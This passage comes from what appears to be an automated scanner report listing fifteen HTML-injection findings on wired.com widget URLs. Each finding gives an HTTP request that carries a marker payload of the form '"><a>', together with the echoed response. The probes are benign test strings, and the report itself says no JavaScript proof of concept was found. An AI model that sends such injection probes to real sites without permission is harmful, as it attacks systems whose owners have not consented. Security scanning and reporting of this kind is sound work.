GET /ajax/widgets/related4f817"><a>9b3c8b9b37f/content/blogPost/playbook_3021 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29389
Vary: Accept-Encoding
Cache-Control: max-age=225
Expires: Mon, 22 Nov 2010 01:15:01 GMT
Date: Mon, 22 Nov 2010 01:11:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_related4f817"><a>9b3c8b9b37f">
...[SNIP]...

1.443. http://www.wired.com/ajax/widgets/related/content/blogPost/reviews_25843 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/reviews_25843

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3c31"><a>f807e40c9a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajaxb3c31"><a>f807e40c9a9/widgets/related/content/blogPost/reviews_25843 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29389
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:14:23 GMT
Date: Mon, 22 Nov 2010 01:10:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajaxb3c31"><a>f807e40c9a9 ss_widgets c_related">
...[SNIP]...

1.444. http://www.wired.com/ajax/widgets/related/content/blogPost/reviews_25843 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/reviews_25843

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 310b1"><a>8982e2d5c82 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets310b1"><a>8982e2d5c82/related/content/blogPost/reviews_25843 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29389
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:14:51 GMT
Date: Mon, 22 Nov 2010 01:10:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets310b1"><a>8982e2d5c82 c_related">
...[SNIP]...

1.445. http://www.wired.com/ajax/widgets/related/content/blogPost/reviews_25843 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/reviews_25843

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2273e"><a>e3e8aa7828e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets/related2273e"><a>e3e8aa7828e/content/blogPost/reviews_25843 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29389
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:10 GMT
Date: Mon, 22 Nov 2010 01:11:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_related2273e"><a>e3e8aa7828e">
...[SNIP]...

1.446. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_20877 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_20877

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e10a5"><a>295271ef989 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajaxe10a5"><a>295271ef989/widgets/related/content/blogPost/threatlevel_20877 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29393
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:14:25 GMT
Date: Mon, 22 Nov 2010 01:10:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajaxe10a5"><a>295271ef989 ss_widgets c_related">
...[SNIP]...

1.447. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_20877 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_20877

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dffe"><a>cc5a2c835a1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets9dffe"><a>cc5a2c835a1/related/content/blogPost/threatlevel_20877 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29393
Vary: Accept-Encoding
Cache-Control: max-age=235
Expires: Mon, 22 Nov 2010 01:14:45 GMT
Date: Mon, 22 Nov 2010 01:10:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets9dffe"><a>cc5a2c835a1 c_related">
...[SNIP]...

1.448. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_20877 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_20877

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e38f1"><a>6244b533a3a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets/relatede38f1"><a>6244b533a3a/content/blogPost/threatlevel_20877 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29393
Vary: Accept-Encoding
Cache-Control: max-age=234
Expires: Mon, 22 Nov 2010 01:15:02 GMT
Date: Mon, 22 Nov 2010 01:11:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_relatede38f1"><a>6244b533a3a">
...[SNIP]...

1.449. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_20913 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_20913

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83ec0"><a>87032be8af7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax83ec0"><a>87032be8af7/widgets/related/content/blogPost/threatlevel_20913 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29393
Vary: Accept-Encoding
Cache-Control: max-age=230
Expires: Mon, 22 Nov 2010 01:14:06 GMT
Date: Mon, 22 Nov 2010 01:10:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax83ec0"><a>87032be8af7 ss_widgets c_related">
...[SNIP]...

1.450. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_20913 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_20913

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfa0d"><a>6a79b0a2118 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgetsdfa0d"><a>6a79b0a2118/related/content/blogPost/threatlevel_20913 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29393
Vary: Accept-Encoding
Cache-Control: max-age=220
Expires: Mon, 22 Nov 2010 01:14:31 GMT
Date: Mon, 22 Nov 2010 01:10:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgetsdfa0d"><a>6a79b0a2118 c_related">
...[SNIP]...

1.451. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_20913 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_20913

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ced2f"><a>d31ee7a0ba1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets/relatedced2f"><a>d31ee7a0ba1/content/blogPost/threatlevel_20913 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29393
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:08 GMT
Date: Mon, 22 Nov 2010 01:11:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_relatedced2f"><a>d31ee7a0ba1">
...[SNIP]...

1.452. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_7588 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_7588

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abb42"><a>82cb0a5692c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajaxabb42"><a>82cb0a5692c/widgets/related/content/blogPost/threatlevel_7588 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29392
Vary: Accept-Encoding
Cache-Control: max-age=237
Expires: Mon, 22 Nov 2010 01:14:27 GMT
Date: Mon, 22 Nov 2010 01:10:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajaxabb42"><a>82cb0a5692c ss_widgets c_related">
...[SNIP]...

1.453. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_7588 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_7588

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97b1b"><a>6f0f8c7e998 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets97b1b"><a>6f0f8c7e998/related/content/blogPost/threatlevel_7588 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29392
Vary: Accept-Encoding
Cache-Control: max-age=225
Expires: Mon, 22 Nov 2010 01:14:41 GMT
Date: Mon, 22 Nov 2010 01:10:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets97b1b"><a>6f0f8c7e998 c_related">
...[SNIP]...

1.454. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_7588 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_7588

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f606f"><a>222e926617f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets/relatedf606f"><a>222e926617f/content/blogPost/threatlevel_7588 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29392
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:15 GMT
Date: Mon, 22 Nov 2010 01:11:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_relatedf606f"><a>222e926617f">
...[SNIP]...

1.455. http://www.wired.com/ajax/widgets/related/content/blogPost/underwire_53528 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/underwire_53528

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3862"><a>16338f02f90 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajaxe3862"><a>16338f02f90/widgets/related/content/blogPost/underwire_53528 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29391
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:14:06 GMT
Date: Mon, 22 Nov 2010 01:10:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajaxe3862"><a>16338f02f90 ss_widgets c_related">
...[SNIP]...

1.456. http://www.wired.com/ajax/widgets/related/content/blogPost/underwire_53528 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/underwire_53528

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb9a4"><a>f176c1e030e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgetseb9a4"><a>f176c1e030e/related/content/blogPost/underwire_53528 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29391
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:14:45 GMT
Date: Mon, 22 Nov 2010 01:10:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgetseb9a4"><a>f176c1e030e c_related">
...[SNIP]...

1.457. http://www.wired.com/ajax/widgets/related/content/blogPost/underwire_53528 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/underwire_53528

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a940d"><a>ad6ce4969ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets/relateda940d"><a>ad6ce4969ca/content/blogPost/underwire_53528 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
